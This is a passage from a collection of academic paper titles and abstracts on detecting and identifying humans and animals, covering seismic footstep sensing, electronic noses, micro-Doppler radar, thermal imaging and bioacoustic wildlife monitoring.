paper presents a new algorithm making use of kurtosis, which is a statistical parameter, to distinguish the seismic signal generated by a person's footsteps from other signals. It is adaptive to any environment and needs no machine study or training. As persons or other targets moving on the ground generate continuous signals in the form of seismic waves, we can separate different targets based on the seismic waves they generate. The parameter of kurtosis is sensitive to impulsive signals, so it's much more sensitive to the signal generated by person footsteps than other signals generated by vehicles, winds, noise, etc. The parameter of kurtosis is usually employed in the financial analysis, but rarely used in other fields. In this paper, we make use of kurtosis to distinguish person from other targets based on its different sensitivity to different signals. Simulation and application results show that this algorithm is very effective in distinguishing person from other targets. --- paper_title: Single- and three-axis geophone: footstep detection with bearing estimation, localization, and tracking paper_content: Tactical capabilities of single and three axis geophones for seismic detection and bearing estimation for homeland security and defense applications are described. It is shown that typically three axis geophones yield a high bearing estimation error. An alternate bearing estimation approach is based on using the time delay in footstep signal detection from three triangulated single axis vertical geophones. In this approach the standard deviation of the bearing estimation error is less than 12 degrees for a walking person distance of 10 to 70m and geophone distances of 8 to 9 m. ::: ::: We find that using the three-axis geophone approach makes it harder for path tracking and bearing estimation within the tactical zone area. We report that a single-axis geophone approach for riangulation of walking person is more effective. In addition, road monitoring is also more efficient using a single-axis geophone approach. We compare ::: the relative and absolute improvement of bearing estimation probability for road monitoring using three single-axis geophones versus 1, 2 and 3 three-axis geophones. We will also discuss the use of single axis vertical geophone sets for monitoring various zone sizes. --- paper_title: Detecting Stink Bugs/Damage in Cotton Utilizing a Portable Electronic Nose paper_content: The goal of this study was to develop effective and affordable tools for detecting stink bugs ::: and stink bug induced damage in cotton production. A commercially available electronic nose ::: (Cyranose 320) was used for this purpose and its performance was evaluated under laboratory and ::: field conditions. The volatile compounds given off by stink bugs were identified to be trans-2-decenal ::: and trans-2-octenal. The E-nose was trained to identify stink bugs' (presence) smell prints. Only four ::: sensors, out of 32 available, responded to volatile chemicals produced by bugs. The same sensors ::: showed identical responses (smell prints) to trans-2-decenal as compared to those obtained from ::: sting bugs. Also, under laboratory conditions, the Cyranose accurately predicted damaged bolls, ::: interior walls of bolls and locks with lint and seed approximately 95 percent of the time. Under ::: laboratory conditions, the E-nose identified presence of stink bugs 100 percent of the time. There ::: was a strong correlation (R2 = 0.95) between the number of sting bugs in a sample and the ::: Cyranose sensors response. Under field conditions, the E-nose was able to identify stink bug ::: damaged bolls 67% of the time. --- paper_title: Gas-Chromatographic Analyses of the Subcaudal Gland Secretion of the European Badger (Meles meles) Part II: Time-Related Variation in the Individual-Specific Composition paper_content: Individuality in body odors has been described in a variety of species, but studies on time-related variation in individual scent are scarce. Here, we use GC-MS to investigate how chemical composition of subcaudal gland secretions of European badgers (Meles meles) varies over days, seasons, and from year to year, and how secretions change with the length of time for which they are exposed to the environment. Samples were divided into subsamples—one was frozen immediately and the remaining ones frozen after 2, 6, 12, 24, and 48 hr, respectively—and many individual-specific characteristics of the scent-profiles remained stable over time. However, two components were negatively correlated with time, thus providing the possibility to determine the age of scent marks. The low variation found in scent profiles of samples collected from the same individual three days apart showed that the individual-specific scent is a true characteristic of the respective badger, and that trapping and subsequent sampling have little effect on the composition of subcaudal gland secretions. Long-term variation (i.e., over one year) in individual subcaudal scent profiles is not continuous, but periods of relative stability are followed by periods of rapid change, that can be related to badger biology. Annual variation between samples collected from the same individuals in winter 1998 and winter 1999, and in spring 1998 and spring 1999 was lower than seasonal variation. Therefore, the results of this study indicate the potential of an individual-specific scent signature in the subcaudal gland secretions of badgers evidencing that individual recognition is of high importance in this species. --- paper_title: Footstep detection and tracking paper_content: Persons or vehicles moving over ground generate a succession of impacts; these soil disturbances propagate away from the source as seismic waves. These seismic waves are especially useful in detecting footsteps which cannot be detected acoustically. Footstep signals can be distinguished from other seismic sources, such as vehicles or wind noise, by their impulsive nature. Even in noisy environments, statistical measures of the seismic amplitude distribution, such as kurtosis, can be used to identify a footstep. These detection methods can be used even with single component geophones. Moreover, the seismic signal is a vector wave that can be used to track the source bearing. To do such tracking a three-component measurement is needed. If multiple sources are separated in angle, we can use this bearing information to estimate the number of walkers. --- paper_title: Mammalian social odours: attraction and individual recognition paper_content: Mammalian social systems rely on signals passed between individuals conveying information including sex, reproductive status, individual identity, ownership, competitive ability and health status. Many of these signals take the form of complex mixtures of molecules sensed by chemosensory systems and have important influences on a variety of behaviours that are vital for reproductive success, such as parent-offspring attachment, mate choice and territorial marking. This article aims to review the nature of these chemosensory cues and the neural pathways mediating their physiological and behavioural effects. Despite the complexities of mammalian societies, there are instances where single molecules can act as classical pheromones attracting interest and approach behaviour. Chemosignals with relatively high volatility can be used to signal at a distance and are sensed by the main olfactory system. Most mammals also possess a vomeronasal system, which is specialized to detect relatively non-volatile chemosensory cues following direct contact. Single attractant molecules are sensed by highly specific receptors using a labelled line pathway. These act alongside more complex mixtures of signals that are required to signal individual identity. There are multiple sources of such individuality chemosignals, based on the highly polymorphic genes of the major histocompatibility complex (MHC) or lipocalins such as the mouse major urinary proteins. The individual profile of volatile components that make up an individual odour signature can be sensed by the main olfactory system, as the pattern of activity across an array of broadly tuned receptor types. In addition, the vomeronasal system can respond highly selectively to non-volatile peptide ligands associated with the MHC, acting at the V2r class of vomeronasal receptor. The ability to recognize individuals or their genetic relatedness plays an important role in mammalian social behaviour. Thus robust systems for olfactory learning and recognition of chemosensory individuality have evolved, often associated with major life events, such as mating, parturition or neonatal development. These forms of learning share common features, such as increased noradrenaline evoked by somatosensory stimulation, which results in neural changes at the level of the olfactory bulb. In the main olfactory bulb, these changes are likely to refine the pattern of activity in response to the learned odour, enhancing its discrimination from those of similar odours. In the accessory olfactory bulb, memory formation is hypothesized to involve a selective inhibition, which disrupts the transmission of the learned chemosignal from the mating male. Information from the main olfactory and vomeronasal systems is integrated at the level of the corticomedial amygdala, which forms the most important pathway by which social odours mediate their behavioural and physiological effects. Recent evidence suggests that this region may also play an important role in the learning and recognition of social chemosignals. --- paper_title: An Electronic Nose Network System for Online Monitoring of Livestock Farm Odors paper_content: An electronic nose (e-nose)-based network system is developed for monitoring odors in and around livestock farms remotely. This network is built from compact e-noses that are tailored to measure odor compounds and environmental conditions such as temperature, wind speed, and humidity. The e-noses are placed at various applicable locations in and around the farm, and the collected odor data are transmitted via wireless network to a computer server, where the data processing algorithms process and analyze the data. The developed e-nose network system enables more effective odor management capabilities for more efficient operation of odor control practice by providing consistent, comprehensive, real-time data about the environment and odor profile in and around the livestock farms. Experimental and simulation results demonstrate the effectiveness of the developed system. --- paper_title: Identification of Stink Bugs Using an Electronic Nose paper_content: Abstract Stink bugs are recognized as pests of several economically important crops, including cotton, soybean and a variety of tree fruits. The Cyranose 320 was used for the classified investigation of stink bug. Stink bugs including males and females of the southern green stink bugs, Nezara viridula , were collected from crop fields around College Station, TX. Results show that the released chemicals and chemical intensity are both critical factors, which determine the rate that the Cyranose 320 correctly identified the stink bugs. The Cyranose 320 shows significant potential in identifying stink bugs, and can classify stink bug samples by species and gender. --- paper_title: Estimation of crowd behavior using sensor networks and sensor fusion paper_content: Commonly, surveillance operators are today monitoring a large number of CCTV screens, trying to solve the complex cognitive tasks of analyzing crowd behavior and detecting threats and other abnormal behavior. Information overload is a rule rather than an exception. Moreover, CCTV footage lacks important indicators revealing certain threats, and can also in other respects be complemented by data from other sensors. This article presents an approach to automatically interpret sensor data and estimate behaviors of groups of people in order to provide the operator with relevant warnings. We use data from distributed heterogeneous sensors (visual cameras and a thermal infrared camera), and process the sensor data using detection algorithms. The extracted features are fed into a Hidden Markov Model in order to model normal behavior and detect deviations. We also discuss the use of radars for weapon detection. --- paper_title: Spectrum analysis techniques for personnel detection using seismic sensors paper_content: There is a general need for improved detection range and false alarm performance for seismic sensors used for personnel detection. In this paper we describe a novel footstep detection algorithm which was developed and run on seismic footstep data collected at the Aberdeen Proving Ground in December 2000. The initial focus was an assessment of achievable detection range. The conventional approach to footstep detection is to detect transients corresponding to individual footfalls. We feel this is an error-prone approach. Because many real-world signals unrelated to human locomotion look like transients, transient-based footstep detection will inevitably either suffer from high false alarm rates or will be insensitive. Instead, we examined the use of spectrum analysis on envelope-detected seismic signals and have found the general method to be quite promising, not only for detection, but also for discrimination against other types of seismic sources. In particular, gait patterns and their corresponding signatures may help discriminate between human intruders and animals. In the APG data set, mean detection ranges of 64 meters (at P D =50%) were observed for normal walking, significantly improving on ranges previously reported. For running, mean detection ranges of 84 meters were observed. However, stealthy walking (creeping) remains a considerable problem. Even at short ranges (10 meters), in some cases the detection rate was less than 50%. In future efforts, additional data sets for a range of geologic and environmental conditions should be acquired and analyzed. Improvements to the detection algorithms are possible, including estimation of direction of travel and the number of intruders. --- paper_title: Acoustic Micro-Doppler Gait Signatures of Humans and Animals paper_content: A micro-Doppler active acoustic sensing system is described. We report its use in acquiring gait signatures of humans and four-legged animals in indoor and outdoor environments. Signals from an accelerometer attached to the leg support the interpretation of the components in the measured micro-Doppler signature. The acoustic micro-Doppler system described in this paper is simpler and offers advantages over the widely used electromagnetic wave micro-Doppler radars. It can be implemented in custom integrated circuits and embedded in a multi-modal wireless sensor network for autonomous detection and classification. --- paper_title: Radar micro-doppler for long range front-view gait recognition paper_content: We seek to understand the extraction of radar micro-Doppler signals generated by human motions at long range and with a front-view to use them as a biometric. We describe micro-Doppler algorithms used for the detection and tracking, and detail the gait features that can be extracted. We have measurements of multiple human subjects in outdoor but low-clutter backgrounds for identification and find that at long range and front-view, the probability of correct classification can be over 80%. However, the micro-Doppler signals are dependent on the direction of motion, and we discuss methods to reduce the effect of the direction of motion. These radar biometric features can serve as identifying features in a scene with multiple subjects. Ground truth using video and GPS is used to validate the radar data. --- paper_title: Geophone Detection of Subterranean Termite and Ant Activity paper_content: A geophone system was used to monitor activity of subterranean termites and ants in a desert environment with low vibration noise. Examples of geophone signals were recorded from a colony of Rhytidoponera taurus (Forel), a colony of Camponotus denticulatus Kirby, and a termite colony (undetermined Drepanotermes sp.) under attack by ants from a nearby C. denticulatus colony. The geophone recordings were compared with signals recorded from accelerometers in a citrus grove containing Solenopsis invicta Buren workers. Because of their small size, all of these insects produce relatively weak sounds. Several different types of insect-generated sounds were identified in the geophone recordings, including high-frequency ticks produced by R. taurus and C. denticulatus, and patterned bursts of head bangs produced by Drepanotermes. The S. invicta produced bursts of ticks with three different stridulation frequencies, possibly produced by three different-sized workers. Overall, both systems performed well in enabling identification of high-frequency or patterned pulses. The geophone was more sensitive than the accelerometer to low-frequency signals, but low-frequency insect sound pulses are more difficult to distinguish from background noises than high-frequency pulses. The low cost of multiple-geophone systems may facilitate development of future applications for wide-area subterranean insect monitoring in quiet environments. --- paper_title: Seismic signal transmission between burrows of the Cape mole-rat, Georychus capensis paper_content: Both seismic and auditory signals were tested for their propagation characteristics in a field study of the Cape mole-rat (Georychus capensis), a subterranean rodent in the family Bathyergidae. This solitary animal is entirely fossorial and apparently communicates with its conspecifics by alternately drumming its hind legs on the burrow floor. Signal production in this species is sexually dimorphic, and mate attraction is likely mediated primarily by seismic signalling between individuals in neighboring burrows. Measurements within, and at various distances away from, natural burrows suggest that seismic signals propagate at least an order of magnitude better than auditory signals. Moreover, using a mechanical thumper which could be triggered from a tape recording of the mole-rat's seismic signals, we established that the vertically-polarized surface wave (Rayleigh wave) propagates with less attenuation than either of the two horizontally-polarized waves. Thus, we tentatively hypothesize that Rayleigh waves subserve intraspecific communication in this species. --- paper_title: Acoustic monitoring in terrestrial environments using microphone arrays: applications, technological considerations and prospectus paper_content: Summary 1. Animals produce sounds for diverse biological functions such as defending territories, attracting mates, deterring predators, navigation, finding food and maintaining contact with members of their social group. Biologists can take advantage of these acoustic behaviours to gain valuable insights into the spatial and temporal scales over which individuals and populations interact. Advances in bioacoustic technology, including the development of autonomous cabled and wireless recording arrays, permit data collection at multiple locations over time. These systems are transforming the way we study individuals and populations of animals and are leading to significant advances in our understandings of the complex interactions between animals and their habitats. 2. Here, we review questions that can be addressed using bioacoustic approaches, by providing a primer on technologies and approaches used to study animals at multiple organizational levels by ecologists, behaviourists and conservation biologists. 3. Spatially dispersed groups of microphones (arrays) enable users to study signal directionality on a small scale or to locate animals and track their movements on a larger scale. 4. Advances in algorithm development can allow users to discriminate among species, sexes, age groups and individuals. 5. With such technology, users can remotely and non-invasively survey populations, describe the soundscape, quantify anthropogenic noise, study species interactions, gain new insights into the social dynamics of sound-producing animals and track the effects of factors such as climate change and habitat fragmentation on phenology and biodiversity. 6. There remain many challenges in the use of acoustic monitoring, including the difficulties in performing signal recognition across taxa. The bioacoustics community should focus on developing a --- paper_title: Acoustic backscattering by deepwater fish measured in situ from a manned submersible paper_content: An outstanding problem in fisheries acoustics is the depth dependence of scattering characteristics of swimbladderbearing fish, andthe effects of pressure on the target strength of physoclistous fish remain unresolved . In situ echoes from deepwater snappers were obtained with a sonar transducer mounted on a manned submersible next to a low-light video camera, permitting simultaneous echo recording and identification of species, fish size and orientation. The sonar system, consisting of a transducer, single board computer, hard disk, and analog-to-digital converter, used a 80ms, broadband signal (bandwidth 35 kHz, center frequency 120 kHz). The observed relationship between fish length and in situ target strength shows no difference from the relationship measured at the surface. No differences in the speciesspecific temporal echo characteristics were observedbetween surface andin situ measures. This ind icates that the size and shape of the snappers’ swimbladders are maintained both at the surface and at depths of up to 250 m. Information obtainedthrough controlledbackscatter measurements of tethered , anesthetizedfish at the surface can be appliedto free-swimming fish at depth. This is the first published account of the use of a manned submersible to measure in situ scattering from identified, individual animals with known orientations. The distinct advantage of this technique comparedwith other in situ techniques is the ability to observe the target fish, obtaining accurate species, size, and orientation information. r 2003 Elsevier Science Ltd. All rights reserved. --- paper_title: Application of Bioradiolocation for Estimation of the Laboratory Animals' Movement Activity paper_content: A method for estimation of the laboratory animals' movement activity by means of bioradar is proposed. The method could be used in time of zoo-psychological and pharmacological experiments. The experimental results for difierent states for the animal are presented. Speciflc features of frequency spectrums for these states are analyzed. Radiolocation of biological objects named as bioradiolocation is an intensively developing area of bio-medical engineering. There are some important medical tasks which could be applications flelds of radiolocation, among them are disaster medicine (searching of survivals under debris and rubbles of buildings), monitoring of breath and heart beating parameters for burned patients (it would cut down the number of used contact censors and thus decrease the risk of infection inoculation into burning wounds), sleep apnea diagnostics, monitoring of breath and heart beating parameters for sick persons, which are the carriers of extra-hazardous infections (it would decrease the risk of medical stafi infection), and etc (1,2). Besides the over listed flelds of application there is an interest in usage of bioradiolocation for remote diagnostics of rats and other laboratory animals by estimation of their moving activity in time of zoo-psychological and pharmacological experiments. At present, invasive methods of physiological parameters determination are used during testing of some medicine and poisonous substances on laboratory animals. Their moving activity used to be estimated visually by researcher. It could be pointed another method that is currently in use for animals' behavior reaction analysis. Specially designed video tracking system such as Ethovision (3) can be applied to decrease a workload of the researcher and create automatic approach to estimation of moving activity. The main disadvantage of this type of systems is necessity to use sophisticated software and some restriction on long time recording with duration more than several hours because of data storage capacity limitations. So, that is why in most cases estimation of rats' moving activity is carried out by researcher visually (4), which might cause in the quality of obtained information. Doppler radar has advantage of direct measurements of animal's moving parameters. It can be used for creation of a fully automatic moving activity integral estimation procedure. In this case the size of data is so small comparing to the video flle that it would allow to record data continuously during several days or more. Moreover in condition of creation special recognition algorithms of radar signals that were re∞ected from animal, it would be possible to discriminate difierent types of its movements (horizontal and vertical activities, grooming, steady state). In that case bioradiolocation can be also applied to data analysis of the open fleld experiments. Several experiments were carried out to investigate possibilities of laboratory animals' movement estimation by means of radar. These experiments and their results are given below. 2. EXPERIMENTAL INSTALLATION Multi-frequency radar with quadrature receiver designed at the Remote Sensing Laboratory was used in experiments with laboratory rats. The radar had following technical characteristics: Number of frequencies 16 --- paper_title: Detection and Classification of Human Body Odor Using an Electronic Nose paper_content: An electronic nose (E-nose) has been designed and equipped with software that can detect and classify human armpit body odor. An array of metal oxide sensors was used for detecting volatile organic compounds. The measurement circuit employs a voltage divider resistor to measure the sensitivity of each sensor. This E-nose was controlled by in-house developed software through a portable USB data acquisition card with a principle component analysis (PCA) algorithm implemented for pattern recognition and classification. Because gas sensor sensitivity in the detection of armpit odor samples is affected by humidity, we propose a new method and algorithms combining hardware/software for the correction of the humidity noise. After the humidity correction, the E-nose showed the capability of detecting human body odor and distinguishing the body odors from two persons in a relative manner. The E-nose is still able to recognize people, even after application of deodorant. In conclusion, this is the first report of the application of an E-nose for armpit odor recognition. --- paper_title: INDIVIDUAL ACOUSTIC IDENTIFICATION AS A NON-INVASIVE CONSERVATION TOOL: AN APPROACH TO THE CONSERVATION OF THE AFRICAN WILD DOG LYCAON PICTUS (TEMMINCK, 1820) paper_content: ABSTRACT Individual variation in acoustic signals can be used for discrimination or identification purposes as a valuable supplement to radio-tagging and visual recognition. In this study, 721 hoo-calls from captive and free-ranging African wild dogs Lycaon pictus (n=9) were investigated for individual acoustic cues. The investigation applied a computer-aided sound analysis that allowed measurement of 93 parameters for each hoo-call. Discriminant function analyses demonstrated that the individuals differed in their call parameters primarily measured on the fundamental frequency. Additional discriminant analyses were run in order to find out if individuals can be re-identified once their hoo-calls are recorded and catalogued into a voice library. This procedure yielded an overall 67% correct assignment for the test data (ranging from 37% to 98% per individual), suggesting an above chance level re-recognition of individuals. The results establish the capability of re-identifying wild dogs using specific aco... --- paper_title: Human Activity Classification Based on Micro-Doppler Signatures Using a Support Vector Machine paper_content: The feasibility of classifying different human activities based on micro-Doppler signatures is investigated. Measured data of 12 human subjects performing seven different activities are collected using a Doppler radar. The seven activities include running, walking, walking while holding a stick, crawling, boxing while moving forward, boxing while standing in place, and sitting still. Six features are extracted from the Doppler spectrogram. A support vector machine (SVM) is then trained using the measurement features to classify the activities. A multiclass classification is implemented using a decision-tree structure. Optimal parameters for the SVM are found through a fourfold cross-validation. The resulting classification accuracy is found to be more than 90%. The potentials of classifying human activities over extended time duration, through wall, and at oblique angles with respect to the radar are also investigated and discussed. --- paper_title: SEGMENTING QUADRUPED GAIT PATTERNS FROM WILDLIFE VIDEO paper_content: This paper describes a novel approach to detecting walking quadrupeds in unedited wildlife film footage. Variable lighting, moving backgrounds and camouflaged animals make traditional foreground extraction techniques such as optical flow and background subtraction unstable. We track a sparse set of points over a short film clip and use RANSAC to segment the foreground region. A novel technique, employing normalised convolution is then utilised to interpolate dense flow from the sparsely defined foreground. Dense flow is extracted for a number of clips demonstrating quadruped gait and other movements. Principal component analysis (PCA) is applied to this set of dense flows and eigenvectors not encapsulating periodic internal motion characteristics are disregarded. The projection coefficients for the remaining principal components are analysed as one dimensional time series. Projection coefficient variation reflects changes in the velocity and relative alignment of the components of the foreground object. These coefficients' relative phase differences are deduced using spectral analysis and degree of periodicity using dynamic time warping. These parameters are used to train a KNN classifier which segments the training data with 93% success rate. By generating projection coefficients for unseen footage, the system has successfully located examples of quadruped gait previously missed by human observers. --- paper_title: On the Detection of Footsteps Based on Acoustic and Seismic Sensing paper_content: In this work, we present a copula-based framework for integrating signals of different but statistically correlated modalities for binary hypothesis testing problems. Specifically, we consider the problem of detecting the presence of a human using footstep signals from seismic and acoustic sensors. An approach based on canonical correlation analysis and copula theory is employed to establish a likelihood ratio test. Experimental results based on real data are presented. --- paper_title: Application of wireless sensor system on security network paper_content: In this research we developed wireless sensor system for security application. We have used geophone to detect seismic ::: signals which are generated by footsteps. Geophones are resonant devices. Therefore, vibration on the land can generate ::: seismic waveforms which could be very similar to the signature by footstep. The signals from human footstep have weak ::: signals to noise ratio and the signal strength is subject to the distance between the sensor and human. In order to detect ::: weak signals from footstep, we designed and fabricated 2-stage amplification circuit which consists of active and RC ::: filters and amplifiers. The bandwidth of filter is 0.7Hz-150Hz and the gain of amplifier is set to 1000. The wireless ::: sensor system also developed to monitor the sensing signals at the remote place. The wireless sensor system consists of 3 ::: units; a wireless sensor unit, a wireless receiver unit, and a monitoring unit. The wireless sensor unit transmits amplified ::: signals from geophone with Zigbee, and the wireless receiver unit which has both Zigbee and Wi-Fi module receives ::: signals from the sensor unit and transmits signals to the monitoring system with Zigbee and Wi-Fi, respectively. By ::: using both Zigbee and Wi-Fi, the wireless sensor system can achieve the low power consumption and wide range ::: coverage. --- paper_title: Chemical characterization of volatile organic compounds on animal farms paper_content: More than one hundred volatile organic substances were identified by gas chromatography and mass spectrometry (GC/MS) in the indoor and outdoor air, stable and farm road dust and farm soil samples from two pig and cattle farms in the South Moravian Region. Volatile fatty acids (acetic, propanoic, butanoic and pentanoic acids) and their esters dominated along with aldehydes (butanal, pentanal and hexanal) and 4-methylphenol in the indoor and outdoor air samples. Road dust and soil samples contained mainly volatile aromatic compounds (toluene, benzene, ethylbenzene, styrene and xylenes), aliphatic hydrocarbons (largely n-alkanes), dichloromethane and carbon disulphide. The health risks associated with particular volatile compounds detected in the indoor and outdoor samples from the farms need to be assessed. --- paper_title: Synthesis of the pheromone-oriented behavior of silkworm moths by a mobile robot with moth antennae as pheromone sensors paper_content: The authors have studied the emergent mechanism in insect behavior by using a robotic system. Since insects have a simpler nervous system than humans, it is an appropriate model for clarifying the above mechanism. In this study, the pheromone oriented behavior of male silkworm moths was shown by a pheromone-guided mobile robot which had male moth antennae that can detect sex pheromones. This study focuses on the pheromone sensor that used antennae from a living moth. Since the antennae of silkworm moths are very sensitive as compared to artificial gas sensors, they can be used as living gas sensors that can detect pheromone molecules. --- paper_title: Detection of Multiple Heartbeats Using Doppler Radar paper_content: Doppler radar life sensing has shown promise in medical and security applications. The current paper considers the problem of determining the number of persons in a given area (e.g., a room) using the Doppler shift due to heartbeat. The signal is weak and time-varying, and therefore poses a complicated signal processing problem. We develop a generalized likelihood ratio test (GLRT) based on a model of the heartbeat, and show that this can be used to distinguish between the presence of 2, 1, or 0 subjects, even with a single antenna. We further extend this to N antennas. The results show that one can expect to detect up to 2N-1 subjects uartsing this technique. --- paper_title: Physiology-Based Face Recognition in the Thermal Infrared Spectrum paper_content: The current dominant approaches to face recognition rely on facial characteristics that are on or over the skin. Some of these characteristics have low permanency can be altered, and their phenomenology varies significantly with environmental factors (e.g., lighting). Many methodologies have been developed to address these problems to various degrees. However, the current framework of face recognition research has a potential weakness due to its very nature. We present a novel framework for face recognition based on physiological information. The motivation behind this effort is to capitalize on the permanency of innate characteristics that are under the skin. To establish feasibility, we propose a specific methodology to capture facial physiological patterns using the bioheat information contained in thermal imagery. First, the algorithm delineates the human face from the background using the Bayesian framework. Then, it localizes the superficial blood vessel network using image morphology. The extracted vascular network produces contour shapes that are characteristic to each individual. The branching points of the skeletonized vascular network are referred to as thermal minutia points (TMPs) and constitute the feature database. To render the method robust to facial pose variations, we collect for each subject to be stored in the database five different pose images (center, midleft profile, left profile, midright profile, and right profile). During the classification stage, the algorithm first estimates the pose of the test image. Then, it matches the local and global TMP structures extracted from the test image with those of the corresponding pose images in the database. We have conducted experiments on a multipose database of thermal facial images collected in our laboratory, as well as on the time-gap database of the University of Notre Dame. The good experimental results show that the proposed methodology has merit, especially with respect to the problem of low permanence over time. More importantly, the results demonstrate the feasibility of the physiological framework in face recognition and open the way for further methodological and experimental research in the area --- paper_title: METHODOLOGICAL INSIGHTS: Using seismic sensors to detect elephants and other large mammals: a potential census technique paper_content: Summary 1. Large mammal populations are difficult to census and monitor in remote areas. In particular, elephant populations in Central Africa are difficult to census due to dense forest, making aerial surveys impractical. Conservation management would be improved by a census technique that was accurate and precise, did not require large efforts in the field, and could record numbers of animals over a period of time. 2. We report a new detection technique that relies on sensing the footfalls of large mammals. A single geophone was used to record the footfalls of elephants and other large mammal species at a waterhole in Etosha National Park, Namibia. 3. Temporal patterning of footfalls is evident for some species, but this pattern is lost when there is more than one individual present. 4. We were able to discriminate between species using the spectral content of their footfalls with an 82% accuracy rate. 5. An estimate of the energy created by passing elephants (the area under the amplitude envelope) can be used to estimate the number of elephants passing the geophone. Our best regression line explained 55% of the variance in the data. This could be improved upon by using an array of geophones. 6. Synthesis and applications. This technique, when calibrated to specific sites, could be used to census elephants and other large terrestrial species that are difficult to count. It could also be used to monitor the temporal use of restricted resources, such as remote waterholes, by large terrestrial species. --- paper_title: Object tracking: A survey paper_content: The goal of this article is to review the state-of-the-art tracking methods, classify them into different categories, and identify new trends. Object tracking, in general, is a challenging problem. Difficulties in tracking objects can arise due to abrupt object motion, changing appearance patterns of both the object and the scene, nonrigid object structures, object-to-object and object-to-scene occlusions, and camera motion. Tracking is usually performed in the context of higher-level applications that require the location and/or shape of the object in every frame. Typically, assumptions are made to constrain the tracking problem in the context of a particular application. In this survey, we categorize the tracking methods on the basis of the object and motion representations used, provide detailed descriptions of representative methods in each category, and examine their pros and cons. Moreover, we discuss the important issues related to tracking including the use of appropriate image features, selection of motion models, and detection of objects. --- paper_title: Automatic identification of bird targets with radar via patterns produced by wing flapping paper_content: Bird identification with radar is important for bird migration research, environmental impact assessments (e.g. wind farms), aircraft security and radar meteorology. In a study on bird migration, radar signals from birds, insects and ground clutter were recorded. Signals from birds show a typical pattern due to wing flapping. The data were labelled by experts into the four classes BIRD, INSECT, CLUTTER and UFO (unidentifiable signals). We present a classification algorithm aimed at automatic recognition of bird targets. Variables related to signal intensity and wing flapping pattern were extracted (via continuous wavelet transform). We used support vector classifiers to build predictive models. We estimated classification performance via cross validation on four datasets. When data from the same dataset were used for training and testing the classifier, the classification performance was extremely to moderately high. When data from one dataset were used for training and the three remaining datasets were used as test sets, the performance was lower but still extremely to moderately high. This shows that the method generalizes well across different locations or times. Our method provides a substantial gain of time when birds must be identified in large collections of radar signals and it represents the first substantial step in developing a real time bird identification radar system. We provide some guidelines and ideas for future research. --- paper_title: Survey of gait recognition paper_content: Gait recognition, the process of identifying an individual by his /her walking style, is a relatively new research area. It has been receiving wide attention in the computer vision community. In this paper, a comprehensive survey of video based gait recognition approaches is presented. And the research challenges and future directions of the gait recognition are also discussed. --- paper_title: Footstep classification using wavelet decomposition paper_content: The characteristics of human footsteps are determined by the gait, the footwear and the floor. Accurate footstep analysis would be useful in various applications, home security service, surveillance and understanding of human action since the gait expresses personality, age and gender. The feasibility of personal identification has been confirmed by using the feature parameter of footsteps, however, it is necessary to use more effective parameters since the recognition rate of this method decreases as the number of subjects increases. In audio classification, Fourier and wavelet transform were used to extract the feature of audio signals. The feasibility of a footstep classification using Fourier and wavelet parameters were confirmed previously. In this paper, we focused on the wavelet parameter which consists of subband power, time-brightness and time-width. Previous work shows that the feature extraction using wavelet transform is effective for footstep categorizations, however, an optimal frame length for feature extraction and the relationship between a recognition rate and the length of feature parameters are not discussed in that paper. This paper provides two dominant results; the frame window size, which yield the good accuracy for footstep classification, is 4096; the feature parameter based on wavelet parameters can be reduced to 2/3 with equivalent recognition rate. Results show that the parameter applied herein yields effective and practical footstep classification. --- paper_title: Normal variation in thermal radiated temperature in cattle: implications for foot-and-mouth disease detection paper_content: BackgroundThermal imagers have been used in a number of disciplines to record animal surface temperatures and as a result detect temperature distributions and abnormalities requiring a particular course of action. Some work, with animals infected with foot-and-mouth disease virus, has suggested that the technique might be used to identify animals in the early stages of disease. In this study, images of 19 healthy cattle have been taken over an extended period to determine hoof and especially coronary band temperatures (a common site for the development of FMD lesions) and eye temperatures (as a surrogate for core body temperature) and to examine how these vary with time and ambient conditions.ResultsThe results showed that under UK conditions an animal's hoof temperature varied from 10°C to 36°C and was primarily influenced by the ambient temperature and the animal's activity immediately prior to measurement. Eye temperatures were not affected by ambient temperature and are a useful indicator of core body temperature.ConclusionsGiven the variation in temperature of the hooves of normal animals under various environmental conditions the use of a single threshold hoof temperature will be at best a modest predictive indicator of early FMD, even if ambient temperature is factored into the evaluation. --- paper_title: Analysis of human footsteps utilizing multi-axial seismic fusion paper_content: This paper introduces a method of enhancing an unattended ground sensor (UGS) system's classification capability of humans via seismic signatures while subsequently discriminating these events from a range of other sources of seismic activity. Previous studies have been performed to consistently discriminate between human and animal signatures using cadence analysis. The studies performed herein will expand upon this methodology by improving both the success rate of such methods as well as the effective range of classification. This is accomplished by fusing multiple seismic axes in real-time to separate impulsive events from environmental noise. Additionally, features can be extracted from the fused axes to gather more advanced information about the source of a seismic event. Compared to more basic cadence determination algorithms, the proposed method substantially improves the detection range and correct classification of humans and significantly decreases false classifications due to animals and ambient conditions. --- paper_title: What you see is not what you get: the role of ultrasonic detectors in increasing inventory completeness in Neotropical bat assemblages paper_content: Summary 1. Microchiropteran bats have the potential to be important biodiversity indicator species as they are distributed globally and are important in ecosystem functioning. Survey and monitoring protocols for bats are often ineffective as sampling techniques vary in their efficacy depending on the species involved and habitats surveyed. Acoustic sampling using bat detectors may prove an alternative or complementary technique to capture methods but is largely untested in the tropics. 2. To compare the efficacy of bat detectors and capture methods in surveys, we used ground mist nets, sub-canopy mist nets and harp traps to sample bats while simultaneously recording the echolocation calls of insectivorous bats in a diversity of habitats in the Yucatan, Mexico. We described echolocation calls, analysed call characteristics to identify species, and compared species inventories derived from traditional capture methods with those derived from acoustic sampling. 3. A total of 2819 bats representing 26 species and six families were captured; 83% were captured in ground nets, 13% in sub-canopy nets and 4% in harp traps. Fourteen species and five phonic types were identified based on five echolocation call characteristics. Discriminant function analysis showed a high level of correct classification of the calls (84·1%), indicating that identification of species by their echolocation calls is feasible. 4. In all habitats, acoustic sampling and capture methods sampled significantly more species each night than capture methods alone. Capture methods failed to sample 30% of the bat fauna, and aerial insectivores were sampled only by bat detectors. 5. Synthesis and applications . Given the importance of bats in ecosystem functioning, and their potential as indicator species, developing effective methodologies to survey and monitor bats is important for sustainable forest management and biodiversity conservation. Acoustic sampling should be used with capture methods to increase inventory completeness in bat assemblage studies, and could form part of a single standardized monitoring protocol that can be used globally in tropical forests, as this method detects aerial insectivores not sampled by capture methods. --- paper_title: Assessing the Use of Call Surveys to Monitor Breeding Anurans in Rhode Island paper_content: Our objective was to develop a long-term monitoring program that quantified anuran population trends in Rhode Island. Because road-based, manual call surveys are widely used in North America to monitor anurans, we assessed the efficacy of using this method to monitor the impact of anthropogenic change of anuran populations in the state. We quantified interspecific variation in calling 